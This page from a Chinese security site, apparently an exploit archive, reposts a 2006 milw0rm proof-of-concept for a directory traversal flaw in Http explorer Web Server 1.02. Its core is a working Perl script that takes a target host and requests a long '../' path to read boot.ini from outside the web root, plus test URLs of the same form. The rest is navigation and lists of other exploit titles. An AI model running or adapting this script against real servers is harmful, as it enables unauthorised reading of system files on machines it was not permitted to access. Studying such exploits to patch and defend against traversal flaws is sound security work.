首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Http explorer Web Server 1.02 Directory Transversal Vulnerability
来源:milw0rm.com 作者:str0ke 发布时间:2006-12-22  

# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test: http://[site]/../../../../ || http://[site]/../
# /str0ke

use LWP::Simple;
use strict;

sub usage
{
print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
print "str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}

my $host= shift || &usage;

getprint "http://" . $host . "/../../../../../../../../boot.ini";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ixprim CMS 1.2 Remote Blind SQ
·DREAM FTP Server 1.0.2 (PORT)
·PHP Advanced Transfer Manager
·IXM Easy Personal FTP Server 5
·MS Windows (MessageBox) Memory
·Enthrallweb ePages (actualpic.
·RealPlayer 10.5 (ActiveX Contr
·File Upload Manager <= 1.0.
·Exploits WinFtp Server Version
·Newsletter MX <= 1.0.2 (ID)
·Hewlett-Packard FTP Print Serv
·Ultimate PHP Board <= 2.0b1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved